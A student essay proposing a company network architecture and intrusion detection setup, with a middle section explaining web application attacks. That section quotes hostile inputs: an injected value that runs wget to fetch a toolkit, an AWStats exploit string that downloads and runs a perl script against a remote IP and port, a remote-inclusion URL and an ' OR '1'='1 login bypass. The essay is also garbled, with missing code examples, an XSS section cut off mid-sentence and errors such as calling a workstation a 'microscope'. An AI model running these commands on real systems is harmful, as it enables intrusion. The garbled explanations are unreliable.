This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.
A design of a communications network is called network architecture. It is a frame work for the specification of networks physicals components and their functional organization and configuration, its operational principles and procedures as well as data formats used in its operation. I have to suggest ideal network architecture for this company. And I also want to provide a basic network diagram its full explanation and justification for its all components that I include. For the internal workstations I concentrate on the architecture for a web application platform. All the above information related on these topics is given below:
I explain some branches related my topic in the task. For the company I try to design ideal network architecture. My entire concept is given below as I want to explain it. I try to use some different steps to full fill my requirements. And all the description is given below.
Needed components of a network architecture:
For make a network many things are needed they are called basic components of a network architectures. The components that help to make a network are given below. And the description of all the equipment is also given and I also try to describe the connections and uses of each component for this network. All networks are made up of some basic components. The components interconnect network nodes, such as Web server, Data base server, Workstation, Router, Switches, Firewall, VPN server, IDS manager, Internet Router, Internet and DMZ etc.
All the needed explanation of these components is given below:
A work station is a high-end microscope design for technical / scientific applications. Intended primarily to be used by one person at a time, they are commonly connected to a local area network and run multi user operating systems. The work station has also been referred to a main frame computer terminal or a PC connected to a network.
A web page delivered by a computer is called web server. Every web server must have an IP address and possibly a domain name. It is a computer program that server content like: webpage, by using HTTP over the WWW. This is also referring at the computer or virtual machine running the program. In large commercial deployments, a server computers running a web server can be rack- mounted with other server to operate a web farm.
A database server is a computer program which provides database services to other computers or computer program that define by the client server model. The term may also refer to a computer dedicated to running such a program. Database management system frequently provides database server functionality. And some DBMS rely exclusively on the client server model for database access.
Router is a device which forwards data packets along network. Router is connected between many or at least two WANs / LANS and with ISP network. A router works like a switch in that it only sends data's data communication to its intended recipient. It blocks broadcasts and packets send to unknown addresses.
A hub is a device that connects a number of systems or network devices. In a network there is a connection point which is common and this is a hub. In a LAN hubs are use to segment. In a hub there are multiple ports. At one port whenever packets arrives on the other port is being copied. That's the reason all the LAN segmentations packets can be seen.
Switch is a hardware device that works like a hub but directs data to a specific port based on the connected device's hardware address. An electrical component which breaks an electrical circuit diverting or interrupting from one conduct to another is called switch.
Firewall is a protection that that can be implemented as a software application or a hardware device and is design to restrict access between networks. It is one kind of technological barriers that is designed to prevent unauthorized and unwanted computer network infrastructure or hosts. Firewall is a single device or a set of devises which is allow or reject network transmissions base upon a set of policy and other criterion.
VPN (Virtual Private Network) server:
A VPN is a secure network that uses a public network, like the internet, to facilitate communication. It is a computer network that uses infrastructure of a public telecommunications like as the internet for providing remote offices or users that are individual with secure access for their network organization. The avoidance of a costly system of owned or lease line that can be used only by the association.
IDS (Instruction detection system) manager:
IDS are a device or software application that monitors network and system activities for malicious activities or policy violations and produces reports to a management station. Instruction prevention is the process of performing arts instruction detection and attempting to bring to an end detect likely incident.
A neutral area designed to allow an organization to offer limited services while protecting critical assets. Like military counterpart a demilitarized zone is designed as a neutral area to separate threats from protected assets with regards to network security, a DMZ is usually accomplished by implementing at least two separate fire walls. One is facing the internet and other facing the internal networks.
Diagram of network architecture:
At first step I design a best architecture diagram for the network which can be helpful for a network setup. And I hope it may useful to prevent every kind of breaches and easy to maintain. The diagram of network architecture is given below:
I understood the nature of the breaches of the company's network I have been explain to the most common attacks on web applications and mitigation strategies. Web applications offer services such as bulletin boards, mail services such as SquirrelMail, online shops, or database administration tools like PhpMyAdmin. They significantly increase the exposed surface area by which a system can be exploited. By their nature, web applications are often widely accessible to the Internet as a whole meaning a very large number of potential attackers. All these factors have caused web applications to become a very attractive target for attackers and the emergence of new attacks. This KYE paper focuses on application threats against common web applications. After reviewing the fundamentals of a typical attack, we will go on to describe the trends we have observed and to describe the research methods that we currently use to observe and monitor these threats.
Measurement of common attacks on web applications:
Web applications commonly face a unique set of vulnerabilities due to their access by browsers, their integration with databases, and the high exposure of related web servers. The modern web server setup commonly presents multiple applications running on one host and available via a single port, creating a large surface area for attack.
There are four major Web applications are at High Risk:
Cross-site Scripting (XSS)
Explanation this web application threats:
Code injection is one such attack, which exploits a web application's interface to the underlying operating system and results in the execution of arbitrary code. A simple example of a PHP code injection attack follows:
$yourName = $_GET['name'];
Directing a web browser to this application at the URL "application.php?name=Magoo" would result in the display of a webpage containing the word "Magoo". However, using the characters "Magoo; wget 220.127.116.11/toolkit.c" would execute two statements within the exec() function. The second statement is a malicious attempt to download a file to the victim host. A vulnerability similar to this was present in some versions of the Advanced Web Statistics (AWStats) script, a popular application used for summarizing information about visitors to a web site. This vulnerability has been widely abused by several worms, including Lupper. Note that AWStats is written in Perl so the problems we describe are by no means unique to PHP.
To quote from the iDEFENSE advisory:
"The problem specifically exists when the application is running as a CGI script on a web server. The "configdir" parameter contains unfiltered user-supplied data that is utilized in a call to the Perl routine open() as can be seen here on line 1082 of awstats.pl:
The "searchdir" variables hold the value of the parameter provided by the attacker from "configdir." An attacker can cause arbitrary commands to be executed by prefixing them with the "|" character."
In the case of the following attempted exploit:
We end up with:
if (open(CONFIG,"|echo ;echo b_exp;wget http://10.0.26.26/libsh/ping.txt;mv ping.txt temp2006;perl temp2006 10.0.233.251 8080...";))
which leads to the execution of the attacker's commands, because of the way perl's 'open()' function works. It seems as if the 'echo b_exp' at the start and a corresponding 'echo e_exp' at the end is intended to simplify parsing of the resulting web page, as in the this published exploit.
The PHPBB vulnerability that was exploited by the Santy worm was a problem of this type. PHPBB is a bulletin board written in PHP which allows users to post and reply to messages about various topics. A Google search for PHPBB reveals around 1.5 million sites at the time of writing. The Santy worm initially attempted to exploit the viewtopic.php vulnerability with a small test payload, simply printing out a particular piece of text. If the resulting web page contained the supplied text, the worm would launch its propagation code. (Eventually Google began to block Santy's queries.) The following is an example of an attack observed against PHPNuke which attempts to run the 'id' command. It is a maliciously crafted HTTP GET request:
The 'id' command identifies the current user and seems to be often used to test command injection issues, as the results of a successful test are easily identifiable.
A remote code-inclusion attack works similarly; for example the following PHP code:
will include a PHP file into the currently executing script. Under certain circumstances, such as the configuration item register_globals being enabled, an attacker may be able to change the value of the variable $librarydir. (Register_globals means that PHP will automatically initialize variables from HTTP GET parameters without the programmer's intervention.) Some configurations of PHP allow the inclusion of code specified by a URL rather than a local file name. The attacker exploiting this vulnerability may attempt to set $librarydir to a value such as "http://18.104.22.168/evilscript.php". If the attack is successful the attacker gains control of the web application.
The vulnerability classes - remote code-inclusion and command injection - should be considered serious as they have resulted in a number of high profile worms attacking the following software:
PHPBB, reported December 21, 2004, attacked by the Santy worm.
AWStats, PHPXMLRPC, WebHints reported November 7, 2005, attacked by the Lupper worm.
Mambo, reported December 6 2005, attacked by the Elxbot worm.
Mambo, PHPXMLRPC, reported February 20, 2006 and attacked by the Mare worm.
An example attack we observed against Mambo CMS is as follows. Again, it is simply a malicious HTTP GET request, exploiting the vulnerability described in Secunia Advisory #14337 :
This has the effect of executing the script of the attackers choosing, here-
'http://192.168.57.112/~photo/cm' - the exact operation of the exploit against the vulnerability can be seen in 'Mambo Exploit' in Appendix A. In this case, the included file is a 'helper' script which attempts to execute the operating system command given by the 'cmd=' parameter. Here the commands given would cause the helper script to be written over the 'index.php' file and the details of the operating system and IP address to be sent to two email addresses. The attackers could then revisit the vulnerable systems at a later date.
An example of a particular helper script, the c99 shell is given in Appendix B, but such scripts typically allow the attacker to execute operating system commands and browse the file system on the web server. Some more advanced ones offer facilities for brute-forcing FTP passwords, updating themselves, connecting to databases, and initiating a connect-back shell session.
Web application attack is SQL injection is suppose a naively implemented login page searches for records in a database which match the given username and password, like this:
$sql = "SELECT * FROM users WHERE username=\'$username\' AND password=\'$password\';";
If the input is not validated correctly, it would be possible to set $username and $password to be "' OR '1'='1". The resulting SQL query would be:
SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1' ;
This SQL query always returns a non-empty result, bypassing the login procedure and enabling the attacker to access the application. By successfully exploiting an SQL injection vulnerability the attacker can often gain superuser/admin access to the application or even the operating system.
The following is an attack we observed against PHPNuke:
which exploits the vulnerability detailed in Secunia advisory #14866 - the 'querylang' parameter is allows an SQL injection attack against the application. This is the original Waraxe advisory about the vulnerability. The following source code is the problem:
$result9 = sql_query("SELECT pollID, pollTitle, timeStamp, voters FROM ".$prefix."_poll_desc $querylang order by voters DESC limit 0,$top", $dbi);
Because the application does not initialize the querylang parameter, an attacker can choose the value (providing register_globals is set in the PHP configuration, which used to be the default). The advisory gives the following example exploit:
and as result we can see md5 hashes of all the admin passwords in place, where normally top 10 votes can be seen :) The exploit will reveal the MD5 hashes of all the administrative users of PHPNuke.
Cross-site Scripting (XSS):
A naive implementation of a bulletin board might store a user's comment in a database and write it straight back to other users who are viewing the thread. By posting something like
Intrusion Detection and Prevention:
Intrusion Detection and Prevention Systems (IDPS) refers to architecture of devices, software and other type of technology solutions that are designed to monitor network and/or system activities for malicious activity. The main functions of 'intrusion prevention systems' are to identify malicious activity, log information about said activity, attempt to block/stop activity, and report activity. Intrusion prevention systems are considered extensions of intrusion detection systems because they both monitor network traffic and/or system activities for malicious activity. The main differences are, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent/block intrusions that are detected. More specifically, IPS can take such actions as sending an alarm, dropping the malicious packets, resetting the connection and/or blocking the traffic from the offending IP address.
Importance of Intrusion Detection and Prevention:
The company has 8 web servers and 2 database servers altogether. They faced security breaches for several times already as their network is compromised by the hackers. As they don't have any IDS (Intuition Detection System) they realize the damage after a long time which brings them to a great loss. So use of IDS is a crying need of the company. Because An Intrusion Detection System can help detect intruders including unexpected, unwanted or unauthorized people or programs on your computer network. It can therefore protect the systems from unpredictable virus storms or security threats posed by malicious hackers. An ideal Intrusion Detection System should therefore:
Not just monitor system activities, but also analyze users as well as system activities
Scrutinize configurations and susceptibilities of various systems
Constantly review system and file integrity
Issue alarms/alerts in case of security attacks
Actively collect evidence about suspicious activities
Automatically launch back-traces
Recognize molds/methods of classic attacks
Look out for irregular activity
Follow strictly for any policy violations by users
There are the three types of categories of intrusion detection:
Network Intrusion Detection Systems (NIDS)
Host Intrusion Detection Systems (HIDS)
Perimeter Intrusion Detection System (PIDS)
VM Based Intrusion Detection System (VMIDS):
Network Intrusion Detection Systems (NIDS)
Packet sniffers can be deployed on a network segment to monitor and inspect data traffic. Network administrators use packet sniffers to review header details and peer into the contents of network packets to troubleshoot network problems. NIDS build upon packet sniffer technology by adding logic. A NIDS sensor reviews network traffic and compares the various characteristics of network packets against known examples of malicious network traffic.
When a match or possible match is identified between the characteristics of network packets and malicious traffic, the IDS system records the activity as an event in as IDS log for further analysis. This event details the date, time, protocol, source network address, destination network address and other pertinent information. Logging is important as it allows a security professional to review the details of the network traffic to determine if the network activity is indeed an attack.
NIDS is an overall system of devices that work together to monitor the network. Most NIDS systems consists of at least one sensor, as well as a collector or manager, a database and a console.
Figure: Typical network IDS architecture
Host Intrusion Detection (HIDS)
Host intrusion detection (HIDS) complements the functionality of network IDS by monitoring activity on computer systems. HIDS sensors, unlike NIDS sensors, do not monitor all the traffic on the network, but instead, listen to traffic on the host itself. However, much like NDIS, the HIDS sensor can compare data to a list of know signatures and generate an event for any data that matches a signature.
HIDS Architecture: A host IDS typically has sensors, a manager, a database and a console like NIDS. The current popular trend in information security is to leverage the same manager, database and console to monitor both the NIDS and the HIDS. The correlation, reporting and alerting can encompass both the network activity and the activity taking place on the systems. This complementary monitoring picture provides a greater level of intelligence for understanding what attacks may be underway.
Figure: Typical HIDS architecture
PERIMETER INTRUSION DETECTION SYSTEM (PIDS):
Perceives and isolates the location of intrusion attempts on perimeter hurdles of significant infrastructures. Using either electronics or more advanced fiber optic cable technology fitted to the perimeter hedge, the PIDS notices uproars on the fence, and this signal is noticed and if an intrusion is noticed and deemed by the system as an intrusion attempt, an alarm is triggered.
VM BASED INTRUISION DETECTION SYSTEM (VMIDS):
This process identifies the intrusion using virtual machine observing. By using this way we can arrange the Intrusion Detection System with Virtual Machine observing. This is most topical one it's still under developing. One thing that no need to split intrusion perceives system by using this we can notice the inclusive activities of an organization.
Some organizations are sufficiently concerned with detecting the earliest signs of widespread incidents, such as major new worms, that they deploy deceptive measures such as honeypots so that they can collect better data on these threats. Honeypot refers to a computer system masking its identity and inviting abuse to collect information on attackers. They are hosts that have no authorized users other than the honeypot administrators because they serve no business function; all activity directed at them is considered suspicious. Attackers will scan and attack honeypots, giving administrators data on new trends and attack tools, particularly malware.
Recommendations to the company about Intrusion Detection and Prevention
Different IDPS like Network-based, host-based or honeypots offer fundamentally different information gathering, logging, detection, and prevention capabilities. Each technology type offers benefits over the other, such as detecting some events that the others cannot, detecting some events with significantly greater accuracy than the other technologies, and performing in-depth analysis without significantly impacting the performance of the protected hosts. Accordingly, organizations should consider using multiple types of IDPS technologies to achieve more comprehensive and accurate detection and prevention of malicious activity, with lower rates of false positives and false negatives.
The Need for Multiple IDPS Technologies
In many environments, a robust IDPS solution cannot be achieved without using multiple types of IDPS technologies. For example, network-based IDPSs cannot monitor wireless protocols, and wireless IDPSs cannot monitor application protocol activity. Table below provides a high-level comparison of the primary IDPS technology types.
Comparison of IDPS Technology Types
IDPS Technology Type
Types of Malicious Activity Detected
Scope per Sensor or Agent
Network, transport, and application TCP/IP layer activity
Multiple network subnets and groups of hosts
Able to analyze the widest range of application protocols; only IDPS that can thoroughly analyze many of them
Host application and operating system (OS) activity; network, transport, and application TCP/IP layer activity
Only IDPS that can analyze activity that was transferred in end-to-end encrypted communications
Integrating Different IDPS Technologies
In many environments, a robust IDPS solution cannot be achieved without using multiple types of IDPS technologies. For example, network-based IDPSs cannot monitor wireless protocols, and wireless IDPSs cannot monitor application protocol activity. Many organizations use multiple IDPS products, usually from different vendors. These products function completely independently of each other. However, if the products are not integrated in any way, the effectiveness of the entire IDPS implementation may be somewhat limited. IDPS products can be directly integrated, such as one product feeding alert data to another product, or they can be indirectly integrated, such as all the IDPS products feeding alert data into a security information and event management system. So for better performance we can use both network based and host based intrusion detection.
Type of information should be gathered during a breach
Intrusion detection is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of possible incidents, which are violations or imminent threats of violation of computer security policies, acceptable use policies, or standard security practices. Incidents have many causes, such as malware (e.g., worms, spyware), attackers gaining unauthorized access to systems from the Internet, and authorized users of systems who misuse their privileges or attempt to gain additional privileges for which they are not authorized.
An intrusion detection system (IDS) is software that automates the intrusion detection process. An intrusion prevention system (IPS) is software that has all the capabilities of an intrusion detection system and can also attempt to stop possible incidents.
In addition to monitoring and analyzing events to identify undesirable activity, all types of IDPS technologies typically perform the following functions:
Recording information related to observed events
Information is usually recorded locally, and might also be sent to separate systems such as centralized logging servers, security information and event management (SIEM) solutions, and enterprise management systems.
Notifying security administrators of important observed events
This notification, known as an alert, occurs through any of several methods, including the following: e-mails, pages, messages on the IDPS user interface, Simple Network Management Protocol (SNMP) traps, syslog messages, and user-defined programs and scripts. A notification message typically includes only basic information regarding an event; administrators need to access the IDPS for additional information.
Reports summarize the monitored events or provide details on particular events of interest.
So from the above discussion we found that the main information that should be gathered during a breach in the company is the log of malicious activities in the network and send them automatically to the respected person.